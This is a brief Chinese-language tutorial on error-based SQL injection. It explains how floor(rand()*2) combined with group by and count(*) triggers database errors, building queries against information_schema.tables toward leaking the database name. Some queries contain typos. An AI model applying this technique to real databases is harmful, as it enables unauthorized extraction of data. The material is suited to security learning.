报错注入

报错注入

 

1，rand()函数可以产生0~1随机数。

rand()函数产生的随机数是0~1,floor函数向下取整，取到的值是固定的“0”，

rand()*2，floor函数取到的值是不固定的“0”或"1"

floor（x）函数向下取整，即取不超过x的最大整数。

rand(0)*2将取0~2中的随机数

floor（rand()*2）记录显示两条就报错

floor（rand(0)*2）记录显示三条一上，且三条以上必报错。

group by对数据进行分组。

详细步骤：

我们先查询数据库

select database();

select concat(database(),floor(rand()*2));

查询名字太长，取个别名为name

select concat(database(),floor(rand()*2))name;

我们查询information.schema.tables表中有多少表格，多少列

select concat(database(),floor(rand()*2))name from information.schema.tables;

 

我们用group by分组

select concat(database(),floor(rand()*2))name from information.schema.tables group by name;

我们用count（）函数进行统计

select count(*) , concat(database(),floor(rand()*2)name from information_schema.tables group by name;